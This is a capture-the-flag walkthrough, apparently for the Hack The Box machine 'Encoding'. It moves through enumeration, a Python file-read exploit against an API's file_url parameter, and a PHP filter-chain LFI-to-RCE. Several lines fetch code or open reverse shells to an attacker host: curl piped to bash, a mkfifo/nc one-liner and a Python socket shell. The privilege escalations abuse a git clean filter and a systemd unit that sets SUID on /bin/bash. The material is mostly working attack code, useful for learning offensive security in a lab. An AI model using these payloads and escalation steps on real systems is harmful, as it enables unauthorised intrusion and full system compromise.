Scanning

> TARGET=10.129.183.183 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//') -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
# the grep pattern and sed expression are quoted so the shell cannot glob/expand them; --min-rate=1000 is loud, so keep the fast full-port sweep for lab targets

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HaxTables
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Domain: haxtables.htb (add it to /etc/hosts; the api and image vhosts found below need entries too)
  • Subdomain / vhost enumeration (Host-header fuzzing against the single IP)
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://haxtables.htb/" -H "Host: FUZZ.haxtables.htb"
# send one request with a bogus Host first and hide that baseline (--hh <chars> / --hw <words>); otherwise every candidate that falls back to the default vhost shows up as a hit

000000051:   200        0 L      0 W        0 Ch        "api"
000000177:   403        9 L      28 W       284 Ch      "image"

LFI (strictly an arbitrary file read: the API fetches whatever URL is passed in file_url, and the file:// scheme is not blocked)

  • api.haxtables.htb exploitable — v3/tools/string/index.php, action str2hex, returns the fetched content hex-encoded in the `data` field
import json
import sys

import requests

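API_URL = 'http://api.haxtables.htb/v3/tools/string/index.php'


def decode_response(body):
    """Turn the API's JSON reply into the raw bytes of the fetched resource.

    The endpoint returns the fetched content hex-encoded in the ``data``
    field. The bytes are returned undecoded on purpose: the original
    ``.decode()`` blew up on binary targets such as .git/index.

    Args:
        body: raw response text from the str2hex endpoint.
    Returns:
        The decoded bytes.
    Raises:
        KeyError if ``data`` is missing, ValueError on malformed JSON/hex.
    """
    return bytes.fromhex(json.loads(body)['data'])


def fetch_file(path, timeout=10):
    """Read an absolute ``path`` from the target through the file_url bug.

    Args:
        path: absolute filesystem path on the target (e.g. '/etc/passwd').
        timeout: request timeout in seconds so a hung backend does not block.
    Returns:
        The file contents as bytes.
    Raises:
        requests.HTTPError on a non-2xx reply (raise_for_status).
    """
    json_data = {
        'action': 'str2hex',
        # file:// is accepted by the backend fetcher; no path filtering observed.
        'file_url': 'file://' + path,
    }
    response = requests.post(API_URL, json=json_data, timeout=timeout)
    response.raise_for_status()
    return decode_response(response.text)


if __name__ == '__main__':
    # No argument keeps the original behaviour (dump /etc/passwd); an argument
    # selects another file, matching the `lfi.py <path>` usage later on.
    target = sys.argv[1] if len(sys.argv) > 1 else '/etc/passwd'
    # Write bytes, not str: .git/index and other binaries are not valid UTF-8.
    sys.stdout.buffer.write(fetch_file(target))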
  • Found: svc:x:1000:1000:svc:/home/svc:/bin/bash
  • Enumerating the filesystem turned up the following:
# /var/www/html/index.php
# /var/www/image/utils.php
// Runs the repo maintenance script as svc. The command string is fixed (no
// user input reaches it), so the pivot lies in what the script trusts, not in
// this call. Matches the single sudo rule for www-data shown later.
function git_commit()
{
    // shell_exec returns the script's stdout, or null when it prints nothing.
    $commit = shell_exec('sudo -u svc /var/www/image/scripts/git-commit.sh');
    return $commit;
}

# /var/www/image/.git/index exits

Foothold: lfi2rce

  • Dump the git index at /var/www/image/.git/index — it is binary, but the tracked file paths are readable in the output
> python lfi.py /var/www/image/.git/index | xxd -r -p
# the script shown earlier already hex-decodes the `data` field itself (and its .decode() would fail on binary content); keep the xxd step only for a variant that prints the raw hex

# spotted a file
actions/action_handler.php
  • Check out actions/action_handler.php with the same file-read helper (called lfi.py above — not to be confused with the /tmp/e.py reverse-shell wrapper used later)
# > python lfi.py /var/www/image/actions/action_handler.php | xxd -r -p
<?php

// image vhost: actions/action_handler.php (recovered via the file-read bug).
// The value of ?page= is passed to include() as-is: no allow-list, no
// basename(), no extension check. Any readable local file, or a php://filter
// chain (which needs no allow_url_include), is therefore included and
// executed — this is the LFI-to-RCE primitive used for the foothold.
include_once 'utils.php';

if (isset($_GET['page'])) {
    $page = $_GET['page'];
    include($page);  // attacker-controlled include path

} else {
    echo jsonify(['message' => 'No page specified!']);
}

?>
  • Check /var/www/html/handler.php
<?php
// /var/www/html/handler.php — public front end that forwards to the API.
// make_api_call comes from the api vhost's utils.php (not shown here).
include_once '../api/utils.php';

if (isset($_FILES['data_file'])) {
    // Multipart branch: action and uri_path are taken straight from POST
    // with no validation at all.
    $is_file = true;
    $action = $_POST['action'];
    $uri_path = $_POST['uri_path'];
    $data = $_FILES['data_file']['tmp_name'];

} else {
    // JSON branch: the raw body is decoded and the keys are read before the
    // existence check below, so a missing key is only a PHP notice.
    $is_file = false;
    $jsondata = json_decode(file_get_contents('php://input'), true);
    $action = $jsondata['action'];
    $data = $jsondata['data'];
    $uri_path = $jsondata['uri_path'];



    // This "validation" only echoes a message: there is no exit/return, so
    // execution always falls through to make_api_call regardless of input.
    if ( empty($jsondata) || !array_key_exists('action', $jsondata) || !array_key_exists('uri_path', $jsondata)) 
    {
        echo jsonify(['message' => 'Insufficient parameters!']);
        // echo jsonify(['message' => file_get_contents('php://input')]);

    }

}

// uri_path is attacker-controlled and reaches make_api_call unfiltered. The
// trigger used later ("test@image.haxtables.htb/...") suggests it becomes the
// host/path of a server-side request, i.e. SSRF into the vhost that returns
// 403 externally — confirm against make_api_call in utils.php.
$response = make_api_call($action, $data, $uri_path, $is_file);
echo $response;

?>
# generate chain
> python php_filter_chain_generator.py --chain '<?= `curl http://<attacker-ip>/shell|bash ` ;?>'
# output is one long php://filter/... string; that whole string is the <payload> placed in the trigger below

# create a shell file — save it as `shell`, the name the curl in the chain requests, and start the listener first (nc -lvnp 4444)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <attacker-ip> 4444 >/tmp/f

# serve the shell file
> python3 -m http.server 80

# trigger — uri_path is handed to make_api_call (not shown; presumably it builds a server-side request), so `test@` acts as URL userinfo and the host becomes image.haxtables.htb, the vhost that returned 403 from outside
> curl http://haxtables.htb/handler.php -d '{"action":"","data":"","uri_path":"test@image.haxtables.htb/actions/action_handler.php?page=<payload>"}'

PE: www-data -> svc

  • Check sudo rights
www-data@encoding:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on encoding:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on encoding:
    (svc) NOPASSWD: /var/www/image/scripts/git-commit.sh
  • Check out /var/www/image/scripts/git-commit.sh
#!/bin/bash
# /var/www/image/scripts/git-commit.sh — www-data may run this as svc via
# sudo without a password. Stages untracked files if any exist, otherwise
# commits the index.
#
# Trust problem: the repository under /var/www/image, including .git/config
# and .git/info/attributes, sits in the web root where www-data can write, so
# the caller decides what git executes as svc. Repo-local filters and hooks
# run with svc's privileges — that is the escalation used below.

# -o lists untracked paths only; --exclude-standard honours .gitignore rules.
u=$(/usr/bin/git --git-dir=/var/www/image/.git  --work-tree=/var/www/image ls-files  -o --exclude-standard)

if [[ $u ]]; then
        # Untracked files present -> stage everything. Staging is what runs any
        # clean filter declared for the matching paths.
        /usr/bin/git --git-dir=/var/www/image/.git  --work-tree=/var/www/image add -A
else
        # Nothing untracked -> commit. --no-verify skips only the pre-commit and
        # commit-msg hooks; it does not disable filters or other hooks.
        /usr/bin/git --git-dir=/var/www/image/.git  --work-tree=/var/www/image commit -m "Commited from API!" --author="james <james@haxtables.htb>"  --no-verify
fi
# setup nc listener on 5555, the port used in the payload below: nc -lvnp 5555

# run the following on the target — despite the name, /tmp/e.py is a shell one-liner that execs python3; git hands the filter command to sh, which runs a shebang-less executable as a shell script, so it works as-is
> echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attacker-ip>\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" > /tmp/e.py
> chmod +x /tmp/e.py
> cd /var/www/image/
> git init

# specify the filter to apply — .git/info/attributes is repo-local and outside the work tree, so it needs no commit; a clean filter only fires when git stages a matching file
> echo '*.php filter=indent' > .git/info/attributes

# specifies the program used to perform the clean action
> git config filter.indent.clean /tmp/e.py

# trigger — the script only takes its `git add -A` branch when untracked files exist, and clean filters run on staging, so if nothing is untracked drop an untracked *.php (e.g. touch x.php) in /var/www/image first
> sudo -u svc /var/www/image/scripts/git-commit.sh

PE: svc -> root

  • sudo rights
svc@encoding:~$ sudo -l
Matching Defaults entries for svc on encoding:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on encoding:
    (root) NOPASSWD: /usr/bin/systemctl restart *
svc@encoding:~$ # requires write access under /etc/systemd/system (no error in the transcript, so svc has it here); systemd loads a unit it has not seen yet on restart, so no daemon-reload is needed; older systemd wants an absolute ExecStart (/usr/bin/chmod); remove the bit afterwards with chmod -s /bin/bash
svc@encoding:~$ echo -e '[Service]\nType=oneshot\nExecStart=chmod +s /bin/bash\n[Install]\nWantedBy=multi-user.target' > /etc/systemd/system/pe.service
svc@encoding:~$ sudo systemctl restart pe
svc@encoding:~$ bash -p
bash-5.1# id
uid=1000(svc) gid=1000(svc) euid=0(root) egid=0(root) groups=0(root),1000(svc)
bash-5.1# cat /root/root.txt